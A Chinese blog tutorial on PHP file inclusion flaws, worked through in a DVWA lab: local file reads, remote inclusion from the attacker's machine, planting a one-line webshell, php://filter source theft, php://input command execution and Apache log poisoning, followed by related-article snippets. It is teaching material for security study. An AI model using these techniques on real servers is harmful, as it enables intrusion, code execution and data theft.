结合DVWA阐述文件包含漏洞

最新推荐文章于 2024-08-16 11:54:28 发布
最新推荐文章于 2024-08-16 11:54:28 发布
阅读量405 收藏
点赞数
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yqavenger/article/details/108963177
版权

一、文件包含漏洞产生的原因

在通过PHP的相应函数(比如include($_REQUEST[666]))引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。
?666=c:/windows/system32/dirvers/etc/hosts

文件包含可以分为:本地文件包含和远程文件包含

二、文件包含漏洞的两个条件

1、include()等函数通过动态变量的方式引入需要包含的文件
2、用户能够控制这个动态变量

三、要实现文件包含,必须要在php.ini里配置两个变量

allow_url_fopen=On
allow_url_include=On

在php.ini中,allow_url_fopen默认是打开的,它表示允许打开URL文件,也就是是否允许将URL(如http://或ftp://)作为文件处理。
allow_url_include默认是关闭的,它表示是否允许引用URL文件,也就是是否允许include/require打开URL(如http://或ftp://)作为文件处理。
也就是说,allow_url_include=On的时候,就容易出现文件包含漏洞
一般情况下,远程文件漏洞包含的都是TXT文件,因为文件包含不受文件类型的影响。

四、在文件包含的时候,还可以使用一些PHP内置协议

PHP带有很多内置的URL风格的封装协议,利用这些协议,也可以完成文件包含漏洞的利用
http:// 访问http(s)网址
file:// 访问本地文件
ftp:// 访问ftp(s)文件
php:// 访问各个输入/输出流

五、DVWA文件包含

攻击机:物理机,IP为192.168.0.2
靶机:虚拟机server2003,IP为192.168.10.24

1、根据源码分析,$file = $_GET[ ‘page’ ];
在这里插入图片描述
可以看到通过url传递参数的,并且默认包含include页面

2、虽然网页默认显示的只有file1、file2和file3,但是通过手动在url中输入file4,也能实现包含。
在这里插入图片描述
3、继续走下去,发现包含本地文件也是可以的。?page=c:/windows/system32/drivers/etc/hosts
通过查看网页源代码,可以看到服务器hosts文件中的内容
在这里插入图片描述
4、目前我在攻击的目标是一台2003的虚拟机,现在把我物理机上的phpstudy打开,之后试一下靶机能不能通过http包含我物理机上的文件。在物理机的网站根目录下添加一个phpinfo.txt文件,构造?page=http://192.168.0.2/phpinfo.txt
在这里插入图片描述
可以看到靶机能够包含http协议的文件,并且因为文件包含不受文件类型的影响,所以即使是phpinfo.txt文件,也能够包含并且解析出来。

5、既然这样的话,现在尝试上传木马到靶机服务器中。先在物理机网站目录下编写一个上传一句话木马地文件,之后把它上传到靶机中,让靶机服务器去解析这个文件,就能在靶机当前访问的网站目录下生成一个一句话木马文件。最后使用菜刀连接。
在这里插入图片描述
执行包含http文件之后,页面没有报错,就是证明执行成功了。它会去解析上面那个文件,解析之后,靶机当前访问的网站目录下就会多出一个一句话木马文件
在这里插入图片描述
可以看到靶机服务器的当前访问的网站目录下确实多了一个一句话木马的脚本文件
在这里插入图片描述
使用菜刀连接
在这里插入图片描述
连接成功。

6、除此之外,还可以使用其他php协议进行文件包含漏洞的利用。比如说,php://filter/read=convert.base64-encode/resource=file1.php,可以在已知网站结构的前提下拿到网站的源代码。这里使用了base64编码,因为有些浏览器可能会检测出这种非法操作,而阻止直接显示网站源代码。但是编码之后再让浏览器显示,它就检测不出来了。拿到编码后的源码之后,在去解个码,就可以拿到网站的源码了
在这里插入图片描述
7、还有一种操作,还是利用PHP的一种支持协议:php://input。它可以通过include包含,再通过POST提交数据,就可以实现直接执行系统命令了
在这里插入图片描述
先传一个这样的参数,再到bp里面抓包。抓到包后,发送到repeater模块,之后在post请求数据里面添加PHP脚本,使用system()函数,可以直接执行cmd命令。
在这里插入图片描述
可以在响应包里面看到,命令执行成功。目前登录的是管理员权限
在这里插入图片描述
8、还有一种操作,就是可以利用apache的日志文件,完成文件包含的漏洞利用
下面就是要利用的那个日志文件,它里面记录了所有的访问记录,无论是访问到的还是没有访问到的。
在这里插入图片描述
在这里插入图片描述
现在访问一个不存在的文件,再去看下日志
在这里插入图片描述
可以看到日志里面最后一条记录的就是这个访问请求
在这里插入图片描述
那么利用这个日志文件,再利用文件包含不受文件类型的影响,只要包含文件中有PHP格式的语句就能解析的特点,就可以完成利用apache日志文件的文件包含漏洞利用。但是还有一点要注意的是,从上面的图中可以看到,日志文件中记录的请求头跟我们写的是有点区别的,因为url在发送的时候,会自动进行url编码,传到服务器之后,记录到日志里面的就是编码之后的样子了。不过问题不大,因为url只是在浏览器里面进行url编码的,所以这里用抓包软件抓下包,再把url编码的地方改回来就行了。
抓包
在这里插入图片描述
把这地方改成这个,再forward过去就行了
在这里插入图片描述
现在再来看看靶机服务器的apache日志文件
在这里插入图片描述
达到目的,之后再利用文件包含这个日志文件
在这里插入图片描述
成功

玄离大人
关注
专栏目录
DVWA-文件包含
Darklord.W
04-09 218
低中高步骤截图 低: 未进行任何过滤 http://192.168.8.135/dvwa/vulnerabilities/fi/?page=/etc/passwd 查看目录 http://192.168.8.135/dvwa/vulnerabilities/fi/?page=c:\boot.ini http://192.168.8.135/dvwa/vul...
一句话木马与图片马
野原新之助
01-16 6597
何为木马? 所谓木马,即向目标主机种植恶意软件或程序(木马),通过主机与目标主机上种植好的木马进行连接,建立一个shell,达到控制目标主机的目的。 比较著名的木马有冰河、灰鸽子等,这些木马都是对主机进行控制。 今天总结的一句话木马,是通过对目标站点、服务器植入木马文件,对网站进行渗透控制。 通常对网站的木马文件植入,都是利用文件上传漏洞进行植入的,先植入小马,再通过小马将大马植入。 小马 小马一...
文件包含漏洞利用
weixin_47081872的博客
09-28 1933
文件保函漏洞 一、文件包含漏洞初步 1.原理 在通过PHP的相应函数(比如include($_REQUEST[666]))引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。?666=c:/windows/system32/dirvers/etc/hosts 2.文件包含漏洞的形成需要满足的俩个条件 (1)include()等函数通过动态变量的方式引入需要包含的文件 (2)用户能够控制这个动态变量 (3)文件包含的俩个重要的PHP参数 all
网络安全 DVWA通关指南 DVWA File Inclusion(文件包含
最新发布
YueXuan_521的博客
08-16 1016
网络安全 DVWA通关指南 DVWA File Inclusion(文件包含) 但我们可以使用file伪协议读取到文件。(这个地方需要文件的绝对路径,与Low级别不同,这里的报错信息需要提交以file开头的不存在文件或路径,否则会返回统一错误页面)文件包含漏洞的产生原因是 PHP 语言在通过引入文件时,引用的文件名,用户可控,由于传入的文件名没有经过合理的校验,或者校验被绕过,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。当被包含的文件在服务器本地时,就形成的本地文件包含漏洞
文件包含漏洞之——防御措施
wsnbbz的博客
03-04 3868
设置白名单 代码在进行文件包含时,如果文件名可以确定,可以设置白名单对传入的参数进行比较。 过滤危险字符 由于Include/Require可以对PHP Wrapper形式的地址进行包含执行(需要配置php.ini),在Linux环境中可以通过”…/…/”的形式进行目录绕过,所以需要判断文件名称是否为合法的PHP文件。 设置文件目录(配置php.ini) PHP配置文件中有open_basedir...
DVWA文件包含
giun的博客
03-09 5035
一、前置知识 1、什么是文件包含 一种代码处理方法,函数如include,require等,参数是文件名。 2、文件包含漏洞 文件名的参数用户可控且过滤不严,被攻击者偷梁换柱 二、尝试low等级 打开文件包含题目会发现以下提示,我们找到php.ini配置文件(一般在安装目录里),把 allow_url_include的值改成on,然后重启phpstudy即可 The PHP function a...
20年时候收集的一些信息安全岗面试题
课嗨教育的专栏
05-02 7710
目录 面试一 面试二 面试三 更多资料可:渗透测试基础课-课程进度_课嗨教育的博客-CSDN博客 面试一 个人介绍: 自我介绍要点:不要用长逻辑句,短小精悍 控制在3-4分钟 1、自我介绍姓名年龄哪里人学校情况不是重点,作为顺滑开场 2、经历与技能啥时候开始学web攻防,实习经历(神舟,做了什么;尚然,做了什么),让人家清楚历史引入技术主题,挑重点 3、业绩/成绩: 研究类:freebuff SRC I春秋...
PHP危险函数总结
Lemon's blog
08-17 3980
前言:PHP中有很多危险函数,如phpinfo() ,这次就来详细总结一下PHP中的危险函数,方便以后学习。 一、PHP代码执行函数 eval()函数 定义和用法: eval() 函数把字符串按照 PHP 代码来计算. 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 这个用法就会产生漏洞,通过一个例子来看一下: <?php $var = "var"; if (isset($_GE...
Java 全栈知识体系( PDF 可下载)
m0_67698950的博客
03-17 5425
40000 +字长文总结,民工哥已将此文整理成PDF文档了,需要的见文后下载获取方式。 全栈知识体系总览 Java入门与进阶 面向对象与Java基础 Java 基础 - 面向对象 Java 基础 - 知识点 Java 基础 - 图谱 & Q/A 基础知识点复习完了以后,我们需要深入的理解Java中的一些基础机制: Java 基础 - 泛型机制详解 Java泛型这个特性是从JDK 1.5才开始加入的,因此为了兼容之前的版本
Java 全栈知识体系
weixin_70730532的博客
07-27 6715
40000 +字长文总结。 面向对象与Java基础 Java 基础 - 面向对象Java 基础 - 知识点Java 基础 - 图谱 & Q/A基础知识点复习完了以后,我们需要深入的理解Java中的一些基础机制:Java 基础 - 泛型机制详解Java泛型这个特性是从JDK 1.5才开始加入的,因此为了兼容之前的版本,Java泛型的实现采取了“伪泛型”的策略,即Java在语法上支持泛型,但是在编译阶段会进行所谓的“类型擦除”(Type Erasure),将所有的泛型表示(尖括号中的内容)都替换为具体的
DVWA 文件包含
m0_56107268的博客
04-30 240
Low <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 没有做任何的现在,可以直接进行文件包含 本地包含: 远程服务器包含 : Medium <?php // The page we wish to display $file = $_GET[ 'page' ]; // Input validation $file = str_replace( array( "...
dvwa文件包含
qq_52986156的博客
10-17 381
直接分析源码发现过滤方式是使用的替换函数str_replace过滤了http://和https://和相对路径的表示符号../替换为空字符串,此处可以双写绕过waf。本地:测试文件未在上层所以不影响直接使用,要是需要读取上层文件同理在使用../的时候插入成双写模式..././根据页面的三个文件点击可以发现后端是get方式用url栏的page传参也可以直接分析源码看到是未作任何过滤。对应的文件存放路径如下(前面是网络访问路径,后面是本地路径)然后我们构造其他不存在的文件有回显报错信息爆出文件路径。
DVWA---文件包含
xiaoxiao的博客
11-27 1878
文件包含定义 开发人员将相同的函数写入单独文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含 文件包含漏洞定义 文件包含漏洞是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行...
dvwa--文件包含
weixin_44769042的博客
09-29 248
目录 low 本地文件包含 远程文件包含 medium high low 查看源码,它会get一个page 然后会交给include() 函数去包含,并读取内容出来 尝试手动修改为一个不存在于链接跳转中的文件 发现了提示,这是个未列出的文件 能执行访问,说明,此处可以包含其他文件 本地文件包含 我们尝试用它来包含获取系统的一些敏感文件 看看能不能通过相对路径去访问(提前在网站根目录创建了一个1.txt) 可根据故意输不存在的文件爆出路径去往前跳 文件包
DVWA——文件包含
小纯的博客
03-21 3188
File Inclusion学习文件包含简介实战:DVWA——文件包含 文件包含简介 一、文件包含简介: 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。 二、文件包含函数: PHP中文件包含函数有以下四种:require()、require_on
DVWA之File Inclusion
谢公子的博客
08-05 1402
File Inclusion File Inclusion,意思是文件包含漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件...
linux下dvwa文件远程包含漏洞,DVWA-文件包含漏洞
05-17
DVWA(Damn Vulnerable Web Application)是一个专门用于漏洞测试的Web应用程序,其中包含了一些常见的Web安全漏洞,包括文件包含漏洞。 在DVWA中,文件包含漏洞主要存在于以下两个文件中: 1. /dvwa/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值